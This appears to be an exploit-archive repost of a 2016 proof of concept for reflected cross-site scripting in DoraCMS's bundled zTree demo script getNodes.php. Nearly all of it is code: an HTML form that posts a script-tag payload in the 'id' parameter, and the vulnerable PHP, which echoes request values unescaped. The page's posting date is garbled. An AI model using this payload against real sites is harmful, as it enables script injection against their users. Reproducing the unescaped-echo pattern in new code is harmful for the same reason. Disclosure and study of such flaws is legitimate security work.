Home / os / win10

DoraCMS Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>DoraCMS Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: DoraCMS Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Download Link : https://github.com/doramart/DoraCMS
|[+]
|[+] Tested on:  Kali Linux 
|[+]
|[+] Date: 12 /29 / 2016
|=============================================================|
|[+] Exploit Code: 
 
<HTML>
    <HEAD><TITLE>DoraCMS Cross Site Scripting</TITLE></HEAD>
    <BODY>
<form action="http://127.0.0.1/DoraCMS-master/public/plugins/ztree/demo/cn/asyncData/getNodes.php" method="post">
    <input type="hidden" name="n" value="n1" />
    <input type="hidden" name="lv" value="0" />
        <input type="hidden" name="id" value="1.3'"/><ScRiPt >alert('M.R.S.L.Y')</ScRiPt>" />
        <input type="hidden" name="otherParam" value="M.R.S.L.Y" />
</form>
    </BODY>
</HTML>
============================================================
Vulnerable code :

<?php ?>
[<?php
$pId = "0";
$pName = "";
$pLevel = "";
$pCheck = "";
if(array_key_exists( 'id',$_REQUEST)) {
    $pId=$_REQUEST['id'];
}
if(array_key_exists( 'lv',$_REQUEST)) {
    $pLevel=$_REQUEST['lv'];
}
if(array_key_exists('n',$_REQUEST)) {
    $pName=$_REQUEST['n'];
}
if(array_key_exists('chk',$_REQUEST)) {
    $pCheck=$_REQUEST['chk'];
}
if ($pId==null || $pId=="") $pId = "0";
if ($pLevel==null || $pLevel=="") $pLevel = "0";
if ($pName==null) $pName = "";
else $pName = $pName.".";

//for ($i=1; $i<9999; $i++) {
//    for ($j=1; $j<999; $j++) {
//
//    }
//}

for ($i=1; $i<5; $i++) {
    $nId = $pId.$i;
    $nName = $pName."n".$i;
    echo "{ id:'".$nId."',    name:'".$nName."',    isParent:".(( $pLevel < "2" && ($i%2)!=0)?"true":"false").($pCheck==""?"":((($pLevel < "2" && ($i%2)!=0)?", halfCheck:true":"").($i==3?", checked:true":"")))."}";
    if ($i<4) {
        echo ",";
    }
}
?>]

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|</BODY></HTML>

 

TOP

Malware :

Exploits :